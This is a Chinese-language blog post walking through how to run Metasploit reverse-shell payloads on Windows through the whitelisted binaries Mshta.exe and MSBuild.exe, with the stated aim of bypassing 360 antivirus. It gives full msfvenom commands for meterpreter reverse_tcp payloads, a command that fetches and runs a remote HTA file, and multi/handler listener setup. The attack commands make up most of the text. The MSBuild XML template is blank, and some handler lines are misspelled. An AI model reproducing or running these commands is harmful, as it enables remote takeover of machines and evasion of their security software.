基于白名单执行payload

前言

在看到亮神的博客后,满满的干货。
在亲自测试基于白名单执行payload的系列后。只有两种白名单还尚且能使用。
全部都是跟着大神一步步无脑操作而来。

基于Mshta.exe 执行 payload

参考资料:对亮神基于白名单Mshta.exe 执行 payload 第五季复现
kali上生成shell.bin

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.110.130 LPORT=4444  -f raw > shell.bin
cat shell.bin |base64 -w 0
image.png

将生成的payload复制到code处。保存为shell.hta


将该hta文件上传到靶机。mshta运行

mshta.exe http://ip/shell.hta

kali配置

use exploit/multi/handler
set paylaod windows/metrpreter/reverse_tcp
set lhost 192.168.110.130
set lport  4444
set exitonsession false
run
image.png

bypass 360

基于Msbuild.exe 执行 payload

参考资料:对亮神基于白名单 Msbuild.exe 执行 payload 第一季复现
msfvenom生成payload

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.1.109 LPORT=4444 -f  csharp

生成的payload放在demo.xml源码


         
         
         
         
         
    
      
    
    
      
      
        
        
        
      
    
  

靶机执行

MSBuild.exe  demo.xml

kali配置

use exploit/multi/handler
set paylaod windows/metrpreter/reverse_tcp
set lhost 192.168.1.109
set lport  4444
set exitonsession false
run
image.png

bypass 360 。但是需要.net 4.0环境

你可能感兴趣的:(基于白名单执行payload)